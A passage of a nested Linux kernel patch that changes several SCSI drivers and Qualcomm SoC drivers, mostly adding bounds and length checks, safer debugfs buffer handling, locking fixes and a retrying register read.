+@@ -2748,8 +2736,6 @@ lpfc_calc_bg_err(struct lpfc_hba *phba, struct lpfc_io_buf *lpfc_cmd)
+ 
+ 		src = (struct scsi_dif_tuple *)sg_virt(sgpe);
+ 		start_ref_tag = scsi_prot_ref_tag(cmd);
+-		if (start_ref_tag == LPFC_INVALID_REFTAG)
+-			goto out;
+ 		start_app_tag = src->app_tag;
+ 		len = sgpe->length;
+ 		while (src && protsegcnt) {
+@@ -3495,11 +3481,11 @@ err:
+ 			     scsi_cmnd->sc_data_direction);
+ 
+ 	lpfc_printf_log(phba, KERN_ERR, LOG_TRACE_EVENT,
+-			"9084 Cannot setup S/G List for HBA"
+-			"IO segs %d/%d SGL %d SCSI %d: %d %d\n",
++			"9084 Cannot setup S/G List for HBA "
++			"IO segs %d/%d SGL %d SCSI %d: %d %d %d\n",
+ 			lpfc_cmd->seg_cnt, lpfc_cmd->prot_seg_cnt,
+ 			phba->cfg_total_seg_cnt, phba->cfg_sg_seg_cnt,
+-			prot_group_type, num_sge);
++			prot_group_type, num_sge, ret);
+ 
+ 	lpfc_cmd->seg_cnt = 0;
+ 	lpfc_cmd->prot_seg_cnt = 0;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 14ae0a9c5d3d8..2093888f154e0 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -139,6 +139,9 @@ _base_get_ioc_facts(struct MPT3SAS_ADAPTER *ioc);
+ static void
+ _base_clear_outstanding_commands(struct MPT3SAS_ADAPTER *ioc);
+ 
++static u32
++_base_readl_ext_retry(const volatile void __iomem *addr);
++
+ /**
+  * mpt3sas_base_check_cmd_timeout - Function
+  *		to check timeout and command termination due
+@@ -214,6 +217,20 @@ _base_readl_aero(const volatile void __iomem *addr)
+ 	return ret_val;
+ }
+ 
++static u32
++_base_readl_ext_retry(const volatile void __iomem *addr)
++{
++	u32 i, ret_val;
++
++	for (i = 0 ; i < 30 ; i++) {
++		ret_val = readl(addr);
++		if (ret_val == 0)
++			continue;
++	}
++
++	return ret_val;
++}
++
+ static inline u32
+ _base_readl(const volatile void __iomem *addr)
+ {
+@@ -941,7 +958,7 @@ mpt3sas_halt_firmware(struct MPT3SAS_ADAPTER *ioc)
+ 
+ 	dump_stack();
+ 
+-	doorbell = ioc->base_readl(&ioc->chip->Doorbell);
++	doorbell = ioc->base_readl_ext_retry(&ioc->chip->Doorbell);
+ 	if ((doorbell & MPI2_IOC_STATE_MASK) == MPI2_IOC_STATE_FAULT) {
+ 		mpt3sas_print_fault_code(ioc, doorbell &
+ 		    MPI2_DOORBELL_DATA_MASK);
+@@ -6697,7 +6714,7 @@ mpt3sas_base_get_iocstate(struct MPT3SAS_ADAPTER *ioc, int cooked)
+ {
+ 	u32 s, sc;
+ 
+-	s = ioc->base_readl(&ioc->chip->Doorbell);
++	s = ioc->base_readl_ext_retry(&ioc->chip->Doorbell);
+ 	sc = s & MPI2_IOC_STATE_MASK;
+ 	return cooked ? sc : s;
+ }
+@@ -6842,7 +6859,7 @@ _base_wait_for_doorbell_ack(struct MPT3SAS_ADAPTER *ioc, int timeout)
+ 					   __func__, count, timeout));
+ 			return 0;
+ 		} else if (int_status & MPI2_HIS_IOC2SYS_DB_STATUS) {
+-			doorbell = ioc->base_readl(&ioc->chip->Doorbell);
++			doorbell = ioc->base_readl_ext_retry(&ioc->chip->Doorbell);
+ 			if ((doorbell & MPI2_IOC_STATE_MASK) ==
+ 			    MPI2_IOC_STATE_FAULT) {
+ 				mpt3sas_print_fault_code(ioc, doorbell);
+@@ -6882,7 +6899,7 @@ _base_wait_for_doorbell_not_used(struct MPT3SAS_ADAPTER *ioc, int timeout)
+ 	count = 0;
+ 	cntdn = 1000 * timeout;
+ 	do {
+-		doorbell_reg = ioc->base_readl(&ioc->chip->Doorbell);
++		doorbell_reg = ioc->base_readl_ext_retry(&ioc->chip->Doorbell);
+ 		if (!(doorbell_reg & MPI2_DOORBELL_USED)) {
+ 			dhsprintk(ioc,
+ 				  ioc_info(ioc, "%s: successful count(%d), timeout(%d)\n",
+@@ -7030,7 +7047,7 @@ _base_handshake_req_reply_wait(struct MPT3SAS_ADAPTER *ioc, int request_bytes,
+ 	__le32 *mfp;
+ 
+ 	/* make sure doorbell is not in use */
+-	if ((ioc->base_readl(&ioc->chip->Doorbell) & MPI2_DOORBELL_USED)) {
++	if ((ioc->base_readl_ext_retry(&ioc->chip->Doorbell) & MPI2_DOORBELL_USED)) {
+ 		ioc_err(ioc, "doorbell is in use (line=%d)\n", __LINE__);
+ 		return -EFAULT;
+ 	}
+@@ -7079,7 +7096,7 @@ _base_handshake_req_reply_wait(struct MPT3SAS_ADAPTER *ioc, int request_bytes,
+ 	}
+ 
+ 	/* read the first two 16-bits, it gives the total length of the reply */
+-	reply[0] = le16_to_cpu(ioc->base_readl(&ioc->chip->Doorbell)
++	reply[0] = le16_to_cpu(ioc->base_readl_ext_retry(&ioc->chip->Doorbell)
+ 	    & MPI2_DOORBELL_DATA_MASK);
+ 	writel(0, &ioc->chip->HostInterruptStatus);
+ 	if ((_base_wait_for_doorbell_int(ioc, 5))) {
+@@ -7087,7 +7104,7 @@ _base_handshake_req_reply_wait(struct MPT3SAS_ADAPTER *ioc, int request_bytes,
+ 			__LINE__);
+ 		return -EFAULT;
+ 	}
+-	reply[1] = le16_to_cpu(ioc->base_readl(&ioc->chip->Doorbell)
++	reply[1] = le16_to_cpu(ioc->base_readl_ext_retry(&ioc->chip->Doorbell)
+ 	    & MPI2_DOORBELL_DATA_MASK);
+ 	writel(0, &ioc->chip->HostInterruptStatus);
+ 
+@@ -7098,10 +7115,10 @@ _base_handshake_req_reply_wait(struct MPT3SAS_ADAPTER *ioc, int request_bytes,
+ 			return -EFAULT;
+ 		}
+ 		if (i >=  reply_bytes/2) /* overflow case */
+-			ioc->base_readl(&ioc->chip->Doorbell);
++			ioc->base_readl_ext_retry(&ioc->chip->Doorbell);
+ 		else
+ 			reply[i] = le16_to_cpu(
+-			    ioc->base_readl(&ioc->chip->Doorbell)
++			    ioc->base_readl_ext_retry(&ioc->chip->Doorbell)
+ 			    & MPI2_DOORBELL_DATA_MASK);
+ 		writel(0, &ioc->chip->HostInterruptStatus);
+ 	}
+@@ -7960,7 +7977,7 @@ _base_diag_reset(struct MPT3SAS_ADAPTER *ioc)
+ 			goto out;
+ 		}
+ 
+-		host_diagnostic = ioc->base_readl(&ioc->chip->HostDiagnostic);
++		host_diagnostic = ioc->base_readl_ext_retry(&ioc->chip->HostDiagnostic);
+ 		drsprintk(ioc,
+ 			  ioc_info(ioc, "wrote magic sequence: count(%d), host_diagnostic(0x%08x)\n",
+ 				   count, host_diagnostic));
+@@ -7980,7 +7997,7 @@ _base_diag_reset(struct MPT3SAS_ADAPTER *ioc)
+ 	for (count = 0; count < (300000000 /
+ 		MPI2_HARD_RESET_PCIE_SECOND_READ_DELAY_MICRO_SEC); count++) {
+ 
+-		host_diagnostic = ioc->base_readl(&ioc->chip->HostDiagnostic);
++		host_diagnostic = ioc->base_readl_ext_retry(&ioc->chip->HostDiagnostic);
+ 
+ 		if (host_diagnostic == 0xFFFFFFFF) {
+ 			ioc_info(ioc,
+@@ -8370,10 +8387,13 @@ mpt3sas_base_attach(struct MPT3SAS_ADAPTER *ioc)
+ 	ioc->rdpq_array_enable_assigned = 0;
+ 	ioc->use_32bit_dma = false;
+ 	ioc->dma_mask = 64;
+-	if (ioc->is_aero_ioc)
++	if (ioc->is_aero_ioc) {
+ 		ioc->base_readl = &_base_readl_aero;
+-	else
++		ioc->base_readl_ext_retry = &_base_readl_ext_retry;
++	} else {
+ 		ioc->base_readl = &_base_readl;
++		ioc->base_readl_ext_retry = &_base_readl;
++	}
+ 	r = mpt3sas_base_map_resources(ioc);
+ 	if (r)
+ 		goto out_free_resources;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.h b/drivers/scsi/mpt3sas/mpt3sas_base.h
+index 05364aa15ecdb..10055c7e4a9f7 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.h
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.h
+@@ -1618,6 +1618,7 @@ struct MPT3SAS_ADAPTER {
+ 	u8		diag_trigger_active;
+ 	u8		atomic_desc_capable;
+ 	BASE_READ_REG	base_readl;
++	BASE_READ_REG	base_readl_ext_retry;
+ 	struct SL_WH_MASTER_TRIGGER_T diag_trigger_master;
+ 	struct SL_WH_EVENT_TRIGGERS_T diag_trigger_event;
+ 	struct SL_WH_SCSI_TRIGGERS_T diag_trigger_scsi;
+diff --git a/drivers/scsi/qedf/qedf_dbg.h b/drivers/scsi/qedf/qedf_dbg.h
+index f4d81127239eb..5ec2b817c694a 100644
+--- a/drivers/scsi/qedf/qedf_dbg.h
++++ b/drivers/scsi/qedf/qedf_dbg.h
+@@ -59,6 +59,8 @@ extern uint qedf_debug;
+ #define QEDF_LOG_NOTICE	0x40000000	/* Notice logs */
+ #define QEDF_LOG_WARN		0x80000000	/* Warning logs */
+ 
++#define QEDF_DEBUGFS_LOG_LEN (2 * PAGE_SIZE)
++
+ /* Debug context structure */
+ struct qedf_dbg_ctx {
+ 	unsigned int host_no;
+diff --git a/drivers/scsi/qedf/qedf_debugfs.c b/drivers/scsi/qedf/qedf_debugfs.c
+index a3ed681c8ce3f..451fd236bfd05 100644
+--- a/drivers/scsi/qedf/qedf_debugfs.c
++++ b/drivers/scsi/qedf/qedf_debugfs.c
+@@ -8,6 +8,7 @@
+ #include <linux/uaccess.h>
+ #include <linux/debugfs.h>
+ #include <linux/module.h>
++#include <linux/vmalloc.h>
+ 
+ #include "qedf.h"
+ #include "qedf_dbg.h"
+@@ -98,7 +99,9 @@ static ssize_t
+ qedf_dbg_fp_int_cmd_read(struct file *filp, char __user *buffer, size_t count,
+ 			 loff_t *ppos)
+ {
++	ssize_t ret;
+ 	size_t cnt = 0;
++	char *cbuf;
+ 	int id;
+ 	struct qedf_fastpath *fp = NULL;
+ 	struct qedf_dbg_ctx *qedf_dbg =
+@@ -108,19 +111,25 @@ qedf_dbg_fp_int_cmd_read(struct file *filp, char __user *buffer, size_t count,
+ 
+ 	QEDF_INFO(qedf_dbg, QEDF_LOG_DEBUGFS, "entered\n");
+ 
+-	cnt = sprintf(buffer, "\nFastpath I/O completions\n\n");
++	cbuf = vmalloc(QEDF_DEBUGFS_LOG_LEN);
++	if (!cbuf)
++		return 0;
++
++	cnt += scnprintf(cbuf + cnt, QEDF_DEBUGFS_LOG_LEN - cnt, "\nFastpath I/O completions\n\n");
+ 
+ 	for (id = 0; id < qedf->num_queues; id++) {
+ 		fp = &(qedf->fp_array[id]);
+ 		if (fp->sb_id == QEDF_SB_ID_NULL)
+ 			continue;
+-		cnt += sprintf((buffer + cnt), "#%d: %lu\n", id,
+-			       fp->completions);
++		cnt += scnprintf(cbuf + cnt, QEDF_DEBUGFS_LOG_LEN - cnt,
++				 "#%d: %lu\n", id, fp->completions);
+ 	}
+ 
+-	cnt = min_t(int, count, cnt - *ppos);
+-	*ppos += cnt;
+-	return cnt;
++	ret = simple_read_from_buffer(buffer, count, ppos, cbuf, cnt);
++
++	vfree(cbuf);
++
++	return ret;
+ }
+ 
+ static ssize_t
+@@ -138,15 +147,14 @@ qedf_dbg_debug_cmd_read(struct file *filp, char __user *buffer, size_t count,
+ 			loff_t *ppos)
+ {
+ 	int cnt;
++	char cbuf[32];
+ 	struct qedf_dbg_ctx *qedf_dbg =
+ 				(struct qedf_dbg_ctx *)filp->private_data;
+ 
+ 	QEDF_INFO(qedf_dbg, QEDF_LOG_DEBUGFS, "debug mask=0x%x\n", qedf_debug);
+-	cnt = sprintf(buffer, "debug mask = 0x%x\n", qedf_debug);
++	cnt = scnprintf(cbuf, sizeof(cbuf), "debug mask = 0x%x\n", qedf_debug);
+ 
+-	cnt = min_t(int, count, cnt - *ppos);
+-	*ppos += cnt;
+-	return cnt;
++	return simple_read_from_buffer(buffer, count, ppos, cbuf, cnt);
+ }
+ 
+ static ssize_t
+@@ -185,18 +193,17 @@ qedf_dbg_stop_io_on_error_cmd_read(struct file *filp, char __user *buffer,
+ 				   size_t count, loff_t *ppos)
+ {
+ 	int cnt;
++	char cbuf[7];
+ 	struct qedf_dbg_ctx *qedf_dbg =
+ 				(struct qedf_dbg_ctx *)filp->private_data;
+ 	struct qedf_ctx *qedf = container_of(qedf_dbg,
+ 	    struct qedf_ctx, dbg_ctx);
+ 
+ 	QEDF_INFO(qedf_dbg, QEDF_LOG_DEBUGFS, "entered\n");
+-	cnt = sprintf(buffer, "%s\n",
++	cnt = scnprintf(cbuf, sizeof(cbuf), "%s\n",
+ 	    qedf->stop_io_on_error ? "true" : "false");
+ 
+-	cnt = min_t(int, count, cnt - *ppos);
+-	*ppos += cnt;
+-	return cnt;
++	return simple_read_from_buffer(buffer, count, ppos, cbuf, cnt);
+ }
+ 
+ static ssize_t
+diff --git a/drivers/scsi/qedi/qedi_main.c b/drivers/scsi/qedi/qedi_main.c
+index 9fd68d362698f..2ee109fb65616 100644
+--- a/drivers/scsi/qedi/qedi_main.c
++++ b/drivers/scsi/qedi/qedi_main.c
+@@ -1977,8 +1977,9 @@ static int qedi_cpu_offline(unsigned int cpu)
+ 	struct qedi_percpu_s *p = this_cpu_ptr(&qedi_percpu);
+ 	struct qedi_work *work, *tmp;
+ 	struct task_struct *thread;
++	unsigned long flags;
+ 
+-	spin_lock_bh(&p->p_work_lock);
++	spin_lock_irqsave(&p->p_work_lock, flags);
+ 	thread = p->iothread;
+ 	p->iothread = NULL;
+ 
+@@ -1989,7 +1990,7 @@ static int qedi_cpu_offline(unsigned int cpu)
+ 			kfree(work);
+ 	}
+ 
+-	spin_unlock_bh(&p->p_work_lock);
++	spin_unlock_irqrestore(&p->p_work_lock, flags);
+ 	if (thread)
+ 		kthread_stop(thread);
+ 	return 0;
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index b597c782b95ee..30bbf33e3a6aa 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -5571,7 +5571,7 @@ static void qla_get_login_template(scsi_qla_host_t *vha)
+ 	__be32 *q;
+ 
+ 	memset(ha->init_cb, 0, ha->init_cb_size);
+-	sz = min_t(int, sizeof(struct fc_els_csp), ha->init_cb_size);
++	sz = min_t(int, sizeof(struct fc_els_flogi), ha->init_cb_size);
+ 	rval = qla24xx_get_port_login_templ(vha, ha->init_cb_dma,
+ 					    ha->init_cb, sz);
+ 	if (rval != QLA_SUCCESS) {
+diff --git a/drivers/scsi/qla4xxx/ql4_os.c b/drivers/scsi/qla4xxx/ql4_os.c
+index 9e849f6b0d0f7..3f2f9734ee42e 100644
+--- a/drivers/scsi/qla4xxx/ql4_os.c
++++ b/drivers/scsi/qla4xxx/ql4_os.c
+@@ -968,6 +968,11 @@ static int qla4xxx_set_chap_entry(struct Scsi_Host *shost, void *data, int len)
+ 	memset(&chap_rec, 0, sizeof(chap_rec));
+ 
+ 	nla_for_each_attr(attr, data, len, rem) {
++		if (nla_len(attr) < sizeof(*param_info)) {
++			rc = -EINVAL;
++			goto exit_set_chap;
++		}
++
+ 		param_info = nla_data(attr);
+ 
+ 		switch (param_info->param) {
+@@ -2750,6 +2755,11 @@ qla4xxx_iface_set_param(struct Scsi_Host *shost, void *data, uint32_t len)
+ 	}
+ 
+ 	nla_for_each_attr(attr, data, len, rem) {
++		if (nla_len(attr) < sizeof(*iface_param)) {
++			rval = -EINVAL;
++			goto exit_init_fw_cb;
++		}
++
+ 		iface_param = nla_data(attr);
+ 
+ 		if (iface_param->param_type == ISCSI_NET_PARAM) {
+@@ -8104,6 +8114,11 @@ qla4xxx_sysfs_ddb_set_param(struct iscsi_bus_flash_session *fnode_sess,
+ 
+ 	memset((void *)&chap_tbl, 0, sizeof(chap_tbl));
+ 	nla_for_each_attr(attr, data, len, rem) {
++		if (nla_len(attr) < sizeof(*fnode_param)) {
++			rc = -EINVAL;
++			goto exit_set_param;
++		}
++
+ 		fnode_param = nla_data(attr);
+ 
+ 		switch (fnode_param->param) {
+diff --git a/drivers/scsi/scsi_transport_iscsi.c b/drivers/scsi/scsi_transport_iscsi.c
+index bf834e72595a3..49dbcd67579aa 100644
+--- a/drivers/scsi/scsi_transport_iscsi.c
++++ b/drivers/scsi/scsi_transport_iscsi.c
+@@ -3013,14 +3013,15 @@ iscsi_if_destroy_conn(struct iscsi_transport *transport, struct iscsi_uevent *ev
+ }
+ 
+ static int
+-iscsi_set_param(struct iscsi_transport *transport, struct iscsi_uevent *ev)
++iscsi_if_set_param(struct iscsi_transport *transport, struct iscsi_uevent *ev, u32 rlen)
+ {
+ 	char *data = (char*)ev + sizeof(*ev);
+ 	struct iscsi_cls_conn *conn;
+ 	struct iscsi_cls_session *session;
+ 	int err = 0, value = 0, state;
+ 
+-	if (ev->u.set_param.len > PAGE_SIZE)
++	if (ev->u.set_param.len > rlen ||
++	    ev->u.set_param.len > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	session = iscsi_session_lookup(ev->u.set_param.sid);
+@@ -3028,6 +3029,10 @@ iscsi_set_param(struct iscsi_transport *transport, struct iscsi_uevent *ev)
+ 	if (!conn || !session)
+ 		return -EINVAL;
+ 
++	/* data will be regarded as NULL-ended string, do length check */
++	if (strlen(data) > ev->u.set_param.len)
++		return -EINVAL;
++
+ 	switch (ev->u.set_param.param) {
+ 	case ISCSI_PARAM_SESS_RECOVERY_TMO:
+ 		sscanf(data, "%d", &value);
+@@ -3117,7 +3122,7 @@ put_ep:
+ 
+ static int
+ iscsi_if_transport_ep(struct iscsi_transport *transport,
+-		      struct iscsi_uevent *ev, int msg_type)
++		      struct iscsi_uevent *ev, int msg_type, u32 rlen)
+ {
+ 	struct iscsi_endpoint *ep;
+ 	int rc = 0;
+@@ -3125,7 +3130,10 @@ iscsi_if_transport_ep(struct iscsi_transport *transport,
+ 	switch (msg_type) {
+ 	case ISCSI_UEVENT_TRANSPORT_EP_CONNECT_THROUGH_HOST:
+ 	case ISCSI_UEVENT_TRANSPORT_EP_CONNECT:
+-		rc = iscsi_if_ep_connect(transport, ev, msg_type);
++		if (rlen < sizeof(struct sockaddr))
++			rc = -EINVAL;
++		else
++			rc = iscsi_if_ep_connect(transport, ev, msg_type);
+ 		break;
+ 	case ISCSI_UEVENT_TRANSPORT_EP_POLL:
+ 		if (!transport->ep_poll)
+@@ -3149,12 +3157,15 @@ iscsi_if_transport_ep(struct iscsi_transport *transport,
+ 
+ static int
+ iscsi_tgt_dscvr(struct iscsi_transport *transport,
+-		struct iscsi_uevent *ev)
++		struct iscsi_uevent *ev, u32 rlen)
+ {
+ 	struct Scsi_Host *shost;
+ 	struct sockaddr *dst_addr;
+ 	int err;
+ 
++	if (rlen < sizeof(*dst_addr))
++		return -EINVAL;
++
+ 	if (!transport->tgt_dscvr)
+ 		return -EINVAL;
+ 
+@@ -3175,7 +3186,7 @@ iscsi_tgt_dscvr(struct iscsi_transport *transport,
+ 
+ static int
+ iscsi_set_host_param(struct iscsi_transport *transport,
+-		     struct iscsi_uevent *ev)
++		     struct iscsi_uevent *ev, u32 rlen)
+ {
+ 	char *data = (char*)ev + sizeof(*ev);
+ 	struct Scsi_Host *shost;
+@@ -3184,7 +3195,8 @@ iscsi_set_host_param(struct iscsi_transport *transport,
+ 	if (!transport->set_host_param)
+ 		return -ENOSYS;
+ 
+-	if (ev->u.set_host_param.len > PAGE_SIZE)
++	if (ev->u.set_host_param.len > rlen ||
++	    ev->u.set_host_param.len > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	shost = scsi_host_lookup(ev->u.set_host_param.host_no);
+@@ -3194,6 +3206,10 @@ iscsi_set_host_param(struct iscsi_transport *transport,
+ 		return -ENODEV;
+ 	}
+ 
++	/* see similar check in iscsi_if_set_param() */
++	if (strlen(data) > ev->u.set_host_param.len)
++		return -EINVAL;
++
+ 	err = transport->set_host_param(shost, ev->u.set_host_param.param,
+ 					data, ev->u.set_host_param.len);
+ 	scsi_host_put(shost);
+@@ -3201,12 +3217,15 @@ iscsi_set_host_param(struct iscsi_transport *transport,
+ }
+ 
+ static int
+-iscsi_set_path(struct iscsi_transport *transport, struct iscsi_uevent *ev)
++iscsi_set_path(struct iscsi_transport *transport, struct iscsi_uevent *ev, u32 rlen)
+ {
+ 	struct Scsi_Host *shost;
+ 	struct iscsi_path *params;
+ 	int err;
+ 
++	if (rlen < sizeof(*params))
++		return -EINVAL;
++
+ 	if (!transport->set_path)
+ 		return -ENOSYS;
+ 
+@@ -3266,12 +3285,15 @@ iscsi_set_iface_params(struct iscsi_transport *transport,
+ }
+ 
+ static int
+-iscsi_send_ping(struct iscsi_transport *transport, struct iscsi_uevent *ev)
++iscsi_send_ping(struct iscsi_transport *transport, struct iscsi_uevent *ev, u32 rlen)
+ {
+ 	struct Scsi_Host *shost;
+ 	struct sockaddr *dst_addr;
+ 	int err;
+ 
++	if (rlen < sizeof(*dst_addr))
++		return -EINVAL;
++
+ 	if (!transport->send_ping)
+ 		return -ENOSYS;
+ 
+@@ -3769,13 +3791,12 @@ exit_host_stats:
+ }
+ 
+ static int iscsi_if_transport_conn(struct iscsi_transport *transport,
+-				   struct nlmsghdr *nlh)
++				   struct nlmsghdr *nlh, u32 pdu_len)
+ {
+ 	struct iscsi_uevent *ev = nlmsg_data(nlh);
+ 	struct iscsi_cls_session *session;
+ 	struct iscsi_cls_conn *conn = NULL;
+ 	struct iscsi_endpoint *ep;
+-	uint32_t pdu_len;
+ 	int err = 0;
+ 
+ 	switch (nlh->nlmsg_type) {
+@@ -3860,8 +3881,6 @@ static int iscsi_if_transport_conn(struct iscsi_transport *transport,
+ 
+ 		break;
+ 	case ISCSI_UEVENT_SEND_PDU:
+-		pdu_len = nlh->nlmsg_len - sizeof(*nlh) - sizeof(*ev);
+-
+ 		if ((ev->u.send_pdu.hdr_size > pdu_len) ||
+ 		    (ev->u.send_pdu.data_size > (pdu_len - ev->u.send_pdu.hdr_size))) {
+ 			err = -EINVAL;
+@@ -3891,6 +3910,7 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 	struct iscsi_internal *priv;
+ 	struct iscsi_cls_session *session;
+ 	struct iscsi_endpoint *ep = NULL;
++	u32 rlen;
+ 
+ 	if (!netlink_capable(skb, CAP_SYS_ADMIN))
+ 		return -EPERM;
+@@ -3910,6 +3930,13 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 
+ 	portid = NETLINK_CB(skb).portid;
+ 
++	/*
++	 * Even though the remaining payload may not be regarded as nlattr,
++	 * (like address or something else), calculate the remaining length
++	 * here to ease following length checks.
++	 */
++	rlen = nlmsg_attrlen(nlh, sizeof(*ev));
++
+ 	switch (nlh->nlmsg_type) {
+ 	case ISCSI_UEVENT_CREATE_SESSION:
+ 		err = iscsi_if_create_session(priv, ep, ev,
+@@ -3966,7 +3993,7 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 			err = -EINVAL;
+ 		break;
+ 	case ISCSI_UEVENT_SET_PARAM:
+-		err = iscsi_set_param(transport, ev);
++		err = iscsi_if_set_param(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_CREATE_CONN:
+ 	case ISCSI_UEVENT_DESTROY_CONN:
+@@ -3974,7 +4001,7 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 	case ISCSI_UEVENT_START_CONN:
+ 	case ISCSI_UEVENT_BIND_CONN:
+ 	case ISCSI_UEVENT_SEND_PDU:
+-		err = iscsi_if_transport_conn(transport, nlh);
++		err = iscsi_if_transport_conn(transport, nlh, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_GET_STATS:
+ 		err = iscsi_if_get_stats(transport, nlh);
+@@ -3983,23 +4010,22 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 	case ISCSI_UEVENT_TRANSPORT_EP_POLL:
+ 	case ISCSI_UEVENT_TRANSPORT_EP_DISCONNECT:
+ 	case ISCSI_UEVENT_TRANSPORT_EP_CONNECT_THROUGH_HOST:
+-		err = iscsi_if_transport_ep(transport, ev, nlh->nlmsg_type);
++		err = iscsi_if_transport_ep(transport, ev, nlh->nlmsg_type, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_TGT_DSCVR:
+-		err = iscsi_tgt_dscvr(transport, ev);
++		err = iscsi_tgt_dscvr(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_SET_HOST_PARAM:
+-		err = iscsi_set_host_param(transport, ev);
++		err = iscsi_set_host_param(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_PATH_UPDATE:
+-		err = iscsi_set_path(transport, ev);
++		err = iscsi_set_path(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_SET_IFACE_PARAMS:
+-		err = iscsi_set_iface_params(transport, ev,
+-					     nlmsg_attrlen(nlh, sizeof(*ev)));
++		err = iscsi_set_iface_params(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_PING:
+-		err = iscsi_send_ping(transport, ev);
++		err = iscsi_send_ping(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_GET_CHAP:
+ 		err = iscsi_get_chap(transport, nlh);
+@@ -4008,13 +4034,10 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 		err = iscsi_delete_chap(transport, ev);
+ 		break;
+ 	case ISCSI_UEVENT_SET_FLASHNODE_PARAMS:
+-		err = iscsi_set_flashnode_param(transport, ev,
+-						nlmsg_attrlen(nlh,
+-							      sizeof(*ev)));
++		err = iscsi_set_flashnode_param(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_NEW_FLASHNODE:
+-		err = iscsi_new_flashnode(transport, ev,
+-					  nlmsg_attrlen(nlh, sizeof(*ev)));
++		err = iscsi_new_flashnode(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_DEL_FLASHNODE:
+ 		err = iscsi_del_flashnode(transport, ev);
+@@ -4029,8 +4052,7 @@ iscsi_if_recv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, uint32_t *group)
+ 		err = iscsi_logout_flashnode_sid(transport, ev);
+ 		break;
+ 	case ISCSI_UEVENT_SET_CHAP:
+-		err = iscsi_set_chap(transport, ev,
+-				     nlmsg_attrlen(nlh, sizeof(*ev)));
++		err = iscsi_set_chap(transport, ev, rlen);
+ 		break;
+ 	case ISCSI_UEVENT_GET_HOST_STATS:
+ 		err = iscsi_get_host_stats(transport, nlh);
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 83d09c2009280..7a1dc5c7c49ee 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -1568,6 +1568,8 @@ static int storvsc_device_configure(struct scsi_device *sdevice)
+ {
+ 	blk_queue_rq_timeout(sdevice->request_queue, (storvsc_timeout * HZ));
+ 
++	/* storvsc devices don't support MAINTENANCE_IN SCSI cmd */
++	sdevice->no_report_opcodes = 1;
+ 	sdevice->no_write_same = 1;
+ 
+ 	/*
+diff --git a/drivers/soc/qcom/ocmem.c b/drivers/soc/qcom/ocmem.c
+index c92d26b73e6fc..27c668eac9647 100644
+--- a/drivers/soc/qcom/ocmem.c
++++ b/drivers/soc/qcom/ocmem.c
+@@ -76,8 +76,12 @@ struct ocmem {
+ #define OCMEM_REG_GFX_MPU_START			0x00001004
+ #define OCMEM_REG_GFX_MPU_END			0x00001008
+ 
+-#define OCMEM_HW_PROFILE_NUM_PORTS(val)		FIELD_PREP(0x0000000f, (val))
+-#define OCMEM_HW_PROFILE_NUM_MACROS(val)	FIELD_PREP(0x00003f00, (val))
++#define OCMEM_HW_VERSION_MAJOR(val)		FIELD_GET(GENMASK(31, 28), val)
++#define OCMEM_HW_VERSION_MINOR(val)		FIELD_GET(GENMASK(27, 16), val)
++#define OCMEM_HW_VERSION_STEP(val)		FIELD_GET(GENMASK(15, 0), val)
++
++#define OCMEM_HW_PROFILE_NUM_PORTS(val)		FIELD_GET(0x0000000f, (val))
++#define OCMEM_HW_PROFILE_NUM_MACROS(val)	FIELD_GET(0x00003f00, (val))
+ 
+ #define OCMEM_HW_PROFILE_LAST_REGN_HALFSIZE	0x00010000
+ #define OCMEM_HW_PROFILE_INTERLEAVING		0x00020000
+@@ -355,6 +359,12 @@ static int ocmem_dev_probe(struct platform_device *pdev)
+ 		}
+ 	}
+ 
++	reg = ocmem_read(ocmem, OCMEM_REG_HW_VERSION);
++	dev_dbg(dev, "OCMEM hardware version: %lu.%lu.%lu\n",
++		OCMEM_HW_VERSION_MAJOR(reg),
++		OCMEM_HW_VERSION_MINOR(reg),
++		OCMEM_HW_VERSION_STEP(reg));
++
+ 	reg = ocmem_read(ocmem, OCMEM_REG_HW_PROFILE);
+ 	ocmem->num_ports = OCMEM_HW_PROFILE_NUM_PORTS(reg);
+ 	ocmem->num_macros = OCMEM_HW_PROFILE_NUM_MACROS(reg);
+diff --git a/drivers/soc/qcom/smem.c b/drivers/soc/qcom/smem.c
+index 4f163d62942c1..af8d90efd91fa 100644
+--- a/drivers/soc/qcom/smem.c
++++ b/drivers/soc/qcom/smem.c
+@@ -723,7 +723,7 @@ EXPORT_SYMBOL(qcom_smem_get_free_space);
+ 
